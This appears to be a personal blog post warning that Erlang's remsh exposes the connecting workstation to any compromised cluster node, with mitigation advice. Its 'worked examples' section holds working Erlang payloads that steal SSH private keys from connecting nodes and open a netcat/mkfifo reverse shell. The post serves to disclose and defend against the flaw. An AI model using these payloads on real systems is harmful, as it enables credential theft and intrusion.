Erlang's remsh is dangerous

Erlang is pretty cool. It makes it easy to write programs that run on multiple computers cooperating over a network.

The core of Erlang is familiar to Unix programmers: to multitask, you use multiple processes. Processes can do work themselves or they can have children do the work for them. Parents know when their children die. Children crashing do not harm their parent or the rest of the system. Sending messages between processes couldn’t be easier:

SomeMessage ! SomeProcess.

The coolest part of Erlang is that SomeProcess can be on the same computer, or it can be halfway across the country in your backup datacenter. The syntax does not change. Messages can be anything. No serializing is required. Like any good tool, it takes away some of the drudgery (in this case, distributing your application) and lets you solve your actual problem.

Needless to say, I like Erlang a lot.

Enter remsh

A nice thing Erlang has is a REPL - a ‘read, evaluate, print loop’. Just like in Ruby or Python, you can type in a little bit of code at a time to see what it does. Contrast this with C or Java, where you need to write a complete program just to try out a single line of code.

A natural extension of Erlang’s REPL is ‘remsh’ (remote shell), which lets you start a REPL on a remote Erlang node. The REPL is in the context of the already-running Erlang instance, so you can debug an application in real time without stopping the system. You invoke remsh like this:

erl -remsh erl@someserver.com -name me@localhost

Assuming you have your ~/.erlang.cookie set properly, you’ll get a REPL on that someserver.com machine.

Why remsh is dangerous

When you make a Secure Shell (SSH) connection to a Unix server, it’s understood that you, and the machine you connect from, are pretty safe. If that server has a hacker actively rooting around in it, and you connect, they cannot do anything nasty to your machine. There are a few exceptions:

If you use agent forwarding, they can impersonate you
If you login with a password, they can steal it
If you use reverse tunnels, they can use them
If your SSH client or xterm or PTY driver or … has a bug in it

The point is, you can SSH to a compromised server without getting your laptop compromised. This is not the case for Erlang’s remsh.

A side-effect of Erlang’s easy distribution is that clustered Erlang nodes have complete access to one another. Part of Erlang’s standard library is devoted to executing arbitrary code on other machines. When you invoke remsh, you become a part of the Erlang cluster. That means if any of the nodes in the cluster have been compromised, it’s game over: arbitrary code can be run on your machine.

But I know my Erlang nodes aren’t compromised!

Then I hope you are using SSL for Erlang distribution, because although your Erlang cookie protects other people from connecting to your nodes, there are no integrity or authenticity mechanisms in Erlang distribution. Once you authenticate, everybody between you and your node can inject commands in the distribution link. In other words, if you remsh to a node on the Internet, anybody along the way can get a shell on your laptop and your Erlang cluster. This is documented, mind:

The TCP/IP distribution uses a handshake which expects a connection based protocol, i.e. the protocol does not include any authentication after the handshake procedure. This is not entirely safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.

I’d replace “not entirely safe” with “not even a little bit safe”, but that’s me.

If you’re using remsh over the Internet, you’re probably doing something wrong to begin with; EPMD (the Erlang Port Mapper Daemon, which maps node names to port numbers) has a history of crasheable bugs and has exactly no authentication (it does not use the Erlang cookie), so it really shouldn’t be on the Internet to begin with. For more on that, see Michael Santos’ post on spoofing the Erlang protocols. In fact, he found effectively the same problem discussed here, 5 years ago, and buried it in a footnote:

It’s worth mentioning as well, since I’ve never seen it discussed, that if you connect in to a distributed Erlang node, everybody who’s authenticated to connect to that node has complete access to your workstation as your uid.

It isn’t really surprising that remsh is implemented this way. It is probably the most elegant way to do a remote REPL; the existing REPL already supports switching between different “jobs”, and Erlang’s distribution mechanism makes it easy to run things on other nodes.

I don’t know how to fix this (and perhaps it doesn’t need to be fixed because people already know not to do this). Maybe not starting the RPC server when using remsh would be enough. Maybe the “nuke it from orbit” approach of reimplementing remsh as a C Node is the only safe way.

Worked examples: stealing private keys and getting a shell

If you compromise a node and want to steal the SSH private keys of every node connecting to you, this code will do the trick. Any time a remsh user connects (well, any node), it will cat ~/.ssh/* and write it to a file in /tmp to pillage later. Nothing is logged to the remsh shell.

spawn(fun Grab_keys() ->
  net_kernel:monitor_nodes(true),
  receive
    {nodeup, Node} ->
      Keys = rpc:call(Node, os, cmd, ["cat ~/.ssh/*"]),
      file:write_file(string:concat("/tmp/", Node), Keys)
  end,
  Grab_keys()
end).

If you want to try this, start an instance of distributed Erlang:

erl -sname compromised_node

Paste the above Erlang code into the Eshell. It’ll kick off an evil process that isn’t linked to anything; if this had been a real Erlang node running real applications, chances are this process would go unnoticed.

Then, connect to the compromised node:

erl -remsh compromised_node@$(hostname) -sname mymachine

Right after you connect, you’ll be able to see a file in /tmp with all your (possibly encrypted) SSH private keys.

If instead you wanted a connect-back shell (and assuming your target has netcat that doesn’t have -e or -c flags), this will do the trick:

spawn(fun Get_shell() ->
  net_kernel:monitor_nodes(true),
  receive
    {nodeup, Node} ->
      Host = "127.0.0.1",
      Port = 5000,
      Cmd = "rm -f /tmp/fifo && mkfifo /tmp/fifo && </tmp/fifo bash | nc ~p ~p 2>&1 >/tmp/fifo &",
      rpc:cast(Node, os, cmd, [io_lib:format(Cmd, [Host, Port])])
  end,
  Get_shell()
end).

Any time a node connects, we’ll start a connect-back shell on it that’ll connect to Host:Port.

So how do I remsh safely?

There might be a better way, but my recommendation is to make an SSH connection to the node first and then remsh from there:

ssh erlang-user@example.com erl -remsh erl@example.com -name remsh@example.com

Whenever you use -name or -sname when starting Erlang, you’re in distributed mode. If you’re doing that from your laptop, you’re probably doing something wrong, remsh or not.

In summary:

Don’t do Erlang distribution over the Internet. Even if you use SSL, EPMD is not protected.
Don’t remsh directly from your laptop, ever. SSH to one of your nodes and run it there.
You’re not putting just your Erlang cluster at risk, but your workstation as well!
Michael Santos’ post on spoofing Erlang distribution is great. If you use Erlang at all, read it.

Alex's blog

Erlang's remsh is dangerous